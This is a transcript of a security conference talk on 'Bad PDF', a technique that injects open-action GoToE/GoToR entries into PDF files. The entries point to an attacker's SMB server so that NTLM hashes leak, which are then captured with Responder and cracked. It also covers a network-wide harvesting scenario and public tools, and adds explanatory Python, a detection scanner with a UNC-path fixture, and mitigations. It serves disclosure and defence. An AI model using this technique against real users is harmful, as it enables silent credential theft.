
Hello everybody, welcome to Bad PDF: Stealing Windows Credentials via PDF Files, with Adi and Ido. Everybody, give them a round of applause.

Thank you everyone for coming. It is a pleasure for us to be here. I am Adi and this is Ido, and today we will be presenting Bad PDF: how Windows credentials can be leaked by manipulating PDF files. We conducted this research following recent publications about stealing passwords by manipulating Microsoft Outlook. We wanted to show that the same can be done with PDF, and we managed to do so. We apologize in advance for our heavy Israeli accent, and I hope you will manage to understand us throughout this presentation.
Great, so the flow of this presentation will be first to talk about PDF in general and the relevant parts of its format, then talk about the attack flow, provide a proof of concept, and then talk about the impact of this attack and its mitigation. So a bit about myself. I hold the position of IPS research team leader. We conduct research on interesting devices, vulnerabilities, and attacks based on our sensors worldwide. This story is a good example of that. Prior to Check Point, I served as an officer in an Israeli military intelligence unit in various R&D positions. My academic background includes a master's in financial mathematics and a bachelor's in applied mathematics. And I can say, in general, I really, really love network protocols. I'm not sure why, but I do. I
mean, I love to see the gaps between how protocols should be implemented according to the RFC and how they are eventually implemented in the wild. And in my free time, I love to play soccer. I wasn't as good as Ido, but I really, really tried. But I wasn't in the front line. And this is a picture of my team playing laser tag. It was a really good experience, and I highly recommend it.

And I'm Ido. I'm a security researcher in this team. I served in the Israeli Air Force Intelligence Wing, and my academic background includes a Bachelor of Science in Information Systems Engineering. Also, I was not allowed to add memes to this presentation, so you will have
to do without.

Okay, so let's talk about PDF in general. PDF was first developed by Adobe in the 90s, and since then many versions have been published over the years. I can also say that in general the original purpose of PDF is to present documents, including text, images, and other types of data, without any dependency on the environment that the file runs on. And this is something that I would like you to understand. So the PDF file structure has four main components. The first one is the header, which basically contains the version of the PDF file, for instance, PDF 1.3. Then the body. The body contains all the objects that make up the file. And we will talk about those
objects in a second. And this is, again, an example of an object within the body. Then the cross-reference table, which is a table that contains information on how to access those objects. And this is, again, an example. And the trailer, which is basically the metadata of the file, for instance the size of the file, as we can see. And this is all together: first the header, then the body, then the cross-reference table, and the trailer. And all of this makes up the PDF file. So there are eight types of objects within a PDF file, and let's name a few: numbers, strings, boolean values, names, and in our specific case we will focus mainly on dictionaries.
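The four-part layout described above can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the three objects (a catalog, a page tree and one empty page) and the helper names `build_minimal_pdf` and `describe` are made up for this example and are not from the talk's slides.

```python
import re


def build_minimal_pdf() -> bytes:
    """Assemble header, body, cross-reference table and trailer, in that order."""
    header = b"%PDF-1.3\n"

    # Body: the objects that make up the file (hypothetical, benign content).
    objects = [
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n",
        b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\nendobj\n",
    ]
    body = b""
    offsets = []
    for obj in objects:
        offsets.append(len(header) + len(body))  # byte offset of this object
        body += obj

    # Cross-reference table: one 20-byte entry per object, plus the free entry 0.
    xref_offset = len(header) + len(body)
    xref = b"xref\n0 %d\n" % (len(objects) + 1)
    xref += b"0000000000 65535 f \n"
    for offset in offsets:
        xref += b"%010d 00000 n \n" % offset

    # Trailer: file-level metadata such as the number of entries (/Size).
    trailer = b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (
        len(objects) + 1,
        xref_offset,
    )
    return header + body + xref + trailer


def describe(pdf: bytes) -> dict:
    """Read back the four components with simple pattern matching."""
    version = re.match(rb"%PDF-(\d\.\d)", pdf).group(1).decode()
    object_count = len(re.findall(rb"^\d+ \d+ obj\b", pdf, re.M))
    xref_pos = int(re.search(rb"startxref\s+(\d+)", pdf).group(1))
    size = int(re.search(rb"trailer\s*<<.*?/Size (\d+)", pdf, re.S).group(1))
    return {
        "version": version,
        "objects": object_count,
        "xref_ok": pdf[xref_pos:xref_pos + 4] == b"xref",
        "size": size,
    }


if __name__ == "__main__":
    print(describe(build_minimal_pdf()))
```

The `describe` helper is deliberately naive: it relies on regular expressions rather than a real PDF parser, which is enough to show where each component sits in the byte stream.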
So a dictionary is a table that contains pairs of objects, keys and values, and in our terminology they are called entries. More specifically, page objects are dictionaries that represent a page within a PDF file. Each of those consists of several mandatory and optional entries. And this is an example of a page object. Let's talk about the relevant entries for our research. The first one is AA. It's a parent entry that contains actions to be performed in general. In many cases, it comes with either O or C. O is a child entry that contains actions to be performed once the file is opened. And C is another child entry that contains actions to be performed once the file is closed. And
we can see in our example that we have an AA entry that comes with O, and the O contains the F, D and S entries.
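As a rough illustration of that nesting, a page object can be modelled as nested Python dictionaries. This is a sketch only: the function name `triggered_actions`, the event labels and the placeholder action `ExampleAction` are assumptions made for this example, not real PDF action types or anything shown in the talk.

```python
def triggered_actions(page: dict) -> dict:
    """Return the actions a page object would run, keyed by the event that fires them."""
    additional_actions = page.get("AA", {})      # parent entry holding the actions
    events = {"O": "on open", "C": "on close"}   # child entries described above
    return {
        label: additional_actions[key]
        for key, label in events.items()
        if key in additional_actions
    }


# A page with no AA entry, and one whose AA entry carries an O child.
plain_page = {"Type": "Page", "MediaBox": [0, 0, 612, 792]}
page_with_open_action = {
    "Type": "Page",
    "AA": {"O": {"S": "ExampleAction"}},  # placeholder action dictionary
}

if __name__ == "__main__":
    print(triggered_actions(plain_page))
    print(triggered_actions(page_with_open_action))
```

The point of the model is that the action sits two levels down from the page: the page holds AA, AA holds O or C, and the child entry holds the action dictionary itself.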
So let's talk about the relevant entries. S describes the type of the action to be performed. For instance, the GoToE action, go-to-embedded. And let's mention what it is. GoToE means to open an external PDF file without notifying the user. Interesting. F describes the location of the other PDF file. For instance, a remote server. And D describes the location to go to within that document. Great. So we talked about PDF in general and how a PDF file is structured. We talked about what objects and entries are, and we talked about the relevant ones for our research. So now it's time to understand what we can do with it. So like good students, let's use what we learned. In addition, I would also like to mention
SMB, the Server Message Block protocol, which is a very popular protocol that provides many services within networks. This protocol is implemented in many networks. We can also say that this protocol was used in many attacks in the past few years, and we can mention WannaCry, for instance, as a significant example. So now, I will let Ido present what we can do with it.

Right. So, here you can see the proof-of-concept code that our team developed. We've used an action dictionary with AA and O entries to make sure that the exploit runs as soon as the PDF file is opened. We then use the F, D and S entries to point the PDF reader to an arbitrary file on our remote SMB server. These five entries are all
that you need to inject into a previously benign PDF file in order to weaponize it. So, let's see what happens when the file is opened. As soon as the PDF file is opened, a request for the arbitrary file we specified, in this case dummy.pdf, is sent to our remote SMB server. Now, we should note two things here. The first is that the arbitrary file does not have to be a PDF. It could be any file at all as long as it exists on the SMB server. And the second: while the example here uses the GoToE action inside the S entry, as in go-to-embedded, the GoToR action, go-to-remote, is just as vulnerable and can be exploited in the exact same manner. So,
as soon as the request is sent, the victim's Windows client attempts to authenticate with the remote server using NTLM Single Sign-On. As part of that protocol, the victim's NTLM details - username, domain name, NTLM hash, and others - are sent to the remote server. And these are easily intercepted by the attacker, as you can see here. This is an example Wireshark capture of an attempt to authenticate using NTLM Single Sign-On. We can see here in plain text that the username Alice, from the domain "donut", tried to authenticate, and we can see an NTLM hash, again in plain text. The attacker can then crack the NTLM hash using publicly available tools and thus recover the Windows credentials of the victim. So to sum that
up, we can weaponize a PDF by injecting very few lines of code. This means that even without prior knowledge of PDF structure or vulnerabilities, an attacker can have a working malicious PDF file in a matter of minutes, or even less if using a public implementation of the exploit, which we'll see later in this presentation. The target only has to be enticed to open the PDF file for the credentials to be leaked. And now, and this is the biggest takeaway here, this is all done without any security alert or any evidence of the attack. There are no malicious processes running in the background, no registry keys being changed, no residue, nothing. Now, let's see an example of an attack using this exploit.
Here we've got an attacker using Kali Linux. The first thing the attacker does is set up Responder in order to intercept and capture any NTLM hashes. Next, the attacker uses one of the public implementations of the exploit to generate a malicious PDF file pointing to his SMB server, which is, in this case, running the Responder service. Now, as you can see, the contents of the malicious PDF are identical to our PoC, except, of course, for the URL of the malicious server. The attacker also runs an HTTP server to host the PDF file. Now, switching to the victim's view,
the victim now downloads the malicious PDF file from the attacker's server. And as you can see, from the victim's point of view, nothing bad really happened when the PDF was opened. Back to the attacker: we can look at Responder's logs and we'll soon find the captured NTLM hash. It's blurry in this case. So let's say we've captured our victim's NTLM hash. Now what do we do? Simple. We crack it using one of many publicly available tools. We can use Hashcat, John the Ripper, and many others. Of course, we can also run a Google search and use an online tool. There are many of those, as you can see right here. In our example, we've used John the Ripper to crack the NTLM hash of
our victim. You can see the usage is very simple. All we have to do is save the captured hash in a file; no other settings need to be tweaked. And as you can see right here, cracking the NTLM hash for user bsides_sf gave us their password: badpdf. So, let's think of a scenario where Bad PDF could be used. The first scenario that comes to mind, the most naive one, is also the most obvious one. An attacker uses an exploit, in our case Bad PDF, to steal credentials and gain an initial foothold on the target network.
The attacker then uses these credentials to deploy a payload. It could be a bot, it could be a miner, it could be a reverse shell, it could be anything they want, before using other exploits to spread laterally throughout the network. This is fine and everything, but we want something a bit more unique to Bad PDF. So let's think of another scenario. This one starts about the same as the first scenario, using Bad PDF to steal the credentials of a user inside the target network. Except this time, the attacker uses the stolen credentials to access a file server inside the network. The attacker then injects the exploit code into a PDF that is available to every user inside the network. That way, every time a user in that network opens
the PDF, their NTLM hash is leaked to the attacker. Which basically means that the attacker is harvesting credentials from the entire network. Scary. Now, let's talk about a few of the implementations that already exist in the wild. The first one is the Metasploit module. Let's take a look at that one. This Metasploit module features two basic functions. The first is to generate a malicious PDF from scratch using the exploit, again, using our PoC code. And the other option is to inject the exploit as a one-liner into a previously benign PDF file, as you can see here. Again, just like the PoC, it uses the AA and O entries, followed by the F, D and S entries. Another implementation, the
one that we've seen in the video, is currently up on GitHub. Let's take a look at that. Much like the Metasploit module, this one also lets you generate the same PDF from scratch, with the same exploit pointing to your server. What sets this one apart from the Metasploit module is that it also runs Responder for the user, which means that an attacker using this implementation only has to follow the instructions on screen, provide his server URL, file name, and the interface to listen on, and the code will do everything for him, from generating the PDF to capturing the NTLM hashes. Of course, you still have to deliver the PDF and entice the victim to open it, but that's a
different issue. Now, Adi will talk about the impact of the exploit.

Great. So let's talk a bit about the impact of this research. You can say that in general, it really raised public awareness of PDF vulnerabilities. It gained worldwide attention. It was covered by many outlets, such as Bleeping Computer and ZDNet, as well as others. And we also saw this phenomenon of tools that try to implement this research. For instance, we talked about the Metasploit module and the one on GitHub, but there are many, many more. Also, we saw that the #BadPDF hashtag became pretty popular. We saw it on LinkedIn, Twitter, and other places. And this CVE was assigned to this vulnerability. And from now on, this is
the CVE. And those are examples of articles that were published. Great, so now let's talk about mitigation in general. At the network level, you can deploy various IPS solutions, and they will all be fine. At the OS level, so Windows, Microsoft published a security update regarding this vulnerability. Adobe also patched this vulnerability through this security update, and Foxit patched it as well.
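As a complement to those mitigations, here is a minimal static-analysis sketch in Python. It flags raw PDF bytes that combine the three ingredients described earlier in the talk: an AA entry, a GoToE or GoToR action, and an F entry whose string starts with a UNC-style path. The function names, the regular expressions and the host `files.example.invalid` are assumptions made for this example and do not come from any IPS product. The check is only a heuristic: it will miss objects stored in compressed streams, and GoToE or GoToR on their own are not necessarily malicious.

```python
import re

# /S /GoToE or /S /GoToR: the action types named in the talk.
ACTION_RE = re.compile(rb"/S\s*/(GoToE|GoToR)\b")
# /F ( \\... ): a file specification whose literal string starts with backslashes.
UNC_RE = re.compile(rb"/F\s*\(\s*(?:\\){2,}[^)]*\)")
# /AA: the additional-actions parent entry.
AA_RE = re.compile(rb"/AA\b")


def scan_pdf_bytes(data: bytes) -> list:
    """Return a list of human-readable findings for the given raw PDF bytes."""
    findings = []
    if AA_RE.search(data):
        findings.append("additional-actions entry (/AA)")
    action = ACTION_RE.search(data)
    if action:
        findings.append("go-to action (/%s)" % action.group(1).decode())
    if UNC_RE.search(data):
        findings.append("file specification starting with a UNC-style path")
    return findings


def is_suspicious(data: bytes) -> bool:
    """Flag only when all three indicators appear together."""
    return len(scan_pdf_bytes(data)) == 3


# Hypothetical test fixtures: a dictionary fragment with all three indicators,
# and an ordinary page object with none of them.
flagged_fragment = (
    rb"<< /Type /Page /AA << /O << "
    rb"/F (\\\\files.example.invalid\\share\\doc) /D [0 /Fit] /S /GoToE "
    rb">> >> >>"
)
benign_fragment = b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>"

if __name__ == "__main__":
    print(scan_pdf_bytes(flagged_fragment))
    print(scan_pdf_bytes(benign_fragment))
```

Requiring all three indicators at once is a design choice to keep false positives down. A stricter or looser policy, or a check for outbound SMB connections at the network level, would be equally reasonable.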
Great, so let's wrap things up. We showed that by using simple manipulations, one can get your NTLM credentials. The attacker just has to understand how to develop the relevant code, how a PDF file is structured, and the relevant syntax, and he can cause serious damage. And the user will not see any evidence of the attack. This is something that I would like you to understand and take from this lecture. In addition, the attacker can leverage this attack and cause even more serious damage. We gave two examples of that, and there are many more. Another thing is that we showed you two relevant tools that implement this vulnerability. We don't encourage you to hack, but if you will try to
do so, maybe we will catch you. Thank you very much. It's been a pleasure.

Thanks, guys. So we have a couple of minutes for questions, if anybody has any. Yes.

So this vulnerability was seen only on Windows or any other operating system? Was it seen on any other OS?

I'm sorry? Can you repeat that? Can you repeat?

This vulnerability that you showed, the Bad PDF vulnerability, was it seen on any other operating system apart from Windows?

Sorry, can you... Can you repeat again? It's kind of hard to...

Did you see this on any other operating system besides Windows?

I'm sorry? If it only affects Windows?

Yeah, like any other platform.

Definitely. Yes? Yeah. Any other questions? You have a
question over there.

This is a problem, actually a legitimate SMB question. You asked about how SMB in general will be prevented by using firewalls and other kinds of... Actually, again, this all comes down to the security implementation inside the network. It depends on that. If you shut down outbound SMB, so... it will stop the connection. You can assure it will happen inside every network.

Is there a way to detect this kind of bad PDF before it's been opened?

Can you repeat that? Can you repeat again?

How do you detect this kind of bad PDF before it's even been executed on your local computer?

So, you're asking how to detect this exploit. First of all, like we've said, you can use IPS solutions that
will... find malicious code inside a PDF, so in the form of static analysis. Again, you will have to look for the outbound SMB connections. Well, it won't be 100% positive, but it will be a good way to look for the exploit. You cannot say that GoToE and GoToR actions are suspicious in general. So it's something that, again, static analysis...

Any other questions? Awesome, thank you so much, guys. Thank you.